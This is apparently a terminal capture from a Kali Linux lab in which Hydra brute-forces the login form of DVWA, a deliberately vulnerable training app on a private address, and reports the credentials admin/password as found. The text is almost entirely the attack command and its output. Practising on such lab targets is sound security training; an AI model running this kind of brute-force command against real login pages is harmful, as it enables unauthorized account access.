┌──(kali㉿kali)-[~/Projects/dvwa-login-bruteforce]
└─$ hydra -L wordlists/users.txt -P wordlists/passwords.txt 192.168.254.130 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-22 11:41:50
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking http-post-form://192.168.254.130:80/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed
[80][http-post-form] host: 192.168.254.130   login: admin   password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-22 11:41:52
